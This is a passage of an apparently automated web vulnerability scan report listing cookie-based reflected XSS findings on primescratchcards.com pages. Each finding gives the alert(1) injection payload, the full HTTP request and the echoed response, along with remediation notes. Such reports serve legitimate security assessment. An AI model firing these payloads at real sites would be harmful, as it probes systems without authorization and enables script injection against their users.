Set-Cookie: ARC=130137f0367%22%3Balert%281%29%2F%2F8f7b742c961; expires=Tue, 15-May-2012 12:34:40 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f0367";alert(1)//8f7b742c961' border='0' width='1' height='1'>
...[SNIP]...

3.357. http://www.primescratchcards.com/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b79ec'%3balert(1)//9fa2a0ee66b was submitted in the ARC cookie. This input was echoed as b79ec';alert(1)//9fa2a0ee66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b79ec'%3balert(1)//9fa2a0ee66b; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7618
Content-Type: text/html
Set-Cookie: ARC=130137b79ec%27%3Balert%281%29%2F%2F9fa2a0ee66b; expires=Tue, 15-May-2012 12:34:40 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137b79ec';alert(1)//9fa2a0ee66b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.358. http://www.primescratchcards.com/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 8b084--><script>alert(1)</script>f263172694a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378b084--><script>alert(1)</script>f263172694a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 7666
Content-Type: text/html
Set-Cookie: ARC=1301378b084%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef263172694a; expires=Tue, 15-May-2012 12:34:42 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301378b084--><script>alert(1)</script>f263172694a">
...[SNIP]...

3.359. http://www.primescratchcards.com/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21188'%3balert(1)//3398f0ac2c6 was submitted in the ARC cookie. This input was echoed as 21188';alert(1)//3398f0ac2c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013721188'%3balert(1)//3398f0ac2c6; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22115
Content-Type: text/html
Set-Cookie: ARC=13013721188%27%3Balert%281%29%2F%2F3398f0ac2c6; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013721188';alert(1)//3398f0ac2c6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.360. http://www.primescratchcards.com/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2ff5"%3balert(1)//38f246d6bff was submitted in the ARC cookie. This input was echoed as b2ff5";alert(1)//38f246d6bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b2ff5"%3balert(1)//38f246d6bff; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22115
Content-Type: text/html
Set-Cookie: ARC=130137b2ff5%22%3Balert%281%29%2F%2F38f246d6bff; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b2ff5";alert(1)//38f246d6bff' border='0' width='1' height='1'>
...[SNIP]...

3.361. http://www.primescratchcards.com/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload df65f--><script>alert(1)</script>47c80733f8a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137df65f--><script>alert(1)</script>47c80733f8a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22163
Content-Type: text/html
Set-Cookie: ARC=130137df65f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E47c80733f8a; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137df65f--><script>alert(1)</script>47c80733f8a">
...[SNIP]...

3.362. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 74d6f--><script>alert(1)</script>8f025fcf095 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013774d6f--><script>alert(1)</script>8f025fcf095; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25909
Content-Type: text/html
Set-Cookie: ARC=13013774d6f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8f025fcf095; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013774d6f--><script>alert(1)</script>8f025fcf095">
...[SNIP]...

3.363. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b0bd'-alert(1)-'c3abf5ca796 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376b0bd'-alert(1)-'c3abf5ca796; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25861
Content-Type: text/html
Set-Cookie: ARC=1301376b0bd%27%2Dalert%281%29%2D%27c3abf5ca796; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=1301376b0bd'-alert(1)-'c3abf5ca796&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.364. http://www.primescratchcards.com/playersclub.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a817f"%3balert(1)//ab581ff1033 was submitted in the ARC cookie. This input was echoed as a817f";alert(1)//ab581ff1033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a817f"%3balert(1)//ab581ff1033; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25895
Content-Type: text/html
Set-Cookie: ARC=130137a817f%22%3Balert%281%29%2F%2Fab581ff1033; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a817f";alert(1)//ab581ff1033' border='0' width='1' height='1'>
...[SNIP]...

3.365. http://www.primescratchcards.com/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b5a'%3balert(1)//6459e002c93 was submitted in the ARC cookie. This input was echoed as 35b5a';alert(1)//6459e002c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013735b5a'%3balert(1)//6459e002c93; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21949
Content-Type: text/html
Set-Cookie: ARC=13013735b5a%27%3Balert%281%29%2F%2F6459e002c93; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013735b5a';alert(1)//6459e002c93&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload b3df5--><script>alert(1)</script>56754053710 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b3df5--><script>alert(1)</script>56754053710; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21997
Content-Type: text/html
Set-Cookie: ARC=130137b3df5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E56754053710; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137b3df5--><script>alert(1)</script>56754053710">
...[SNIP]...

3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33310"%3balert(1)//3d9ccf14ce8 was submitted in the ARC cookie. This input was echoed as 33310";alert(1)//3d9ccf14ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013733310"%3balert(1)//3d9ccf14ce8; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22051
Content-Type: text/html
Set-Cookie: ARC=13013733310%22%3Balert%281%29%2F%2F3d9ccf14ce8; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013733310";alert(1)//3d9ccf14ce8' border='0' width='1' height='1'>
...[SNIP]...

3.368. http://www.primescratchcards.com/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ce4"%3balert(1)//42e489c06ee was submitted in the ARC cookie. This input was echoed as 60ce4";alert(1)//42e489c06ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013760ce4"%3balert(1)//42e489c06ee; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57467
Content-Type: text/html
Set-Cookie: ARC=13013760ce4%22%3Balert%281%29%2F%2F42e489c06ee; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013760ce4";alert(1)//42e489c06ee' border='0' width='1' height='1'>
...[SNIP]...

3.369. http://www.primescratchcards.com/terms.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93635'%3balert(1)//e5ec88b1b5a was submitted in the ARC cookie. This input was echoed as 93635';alert(1)//e5ec88b1b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

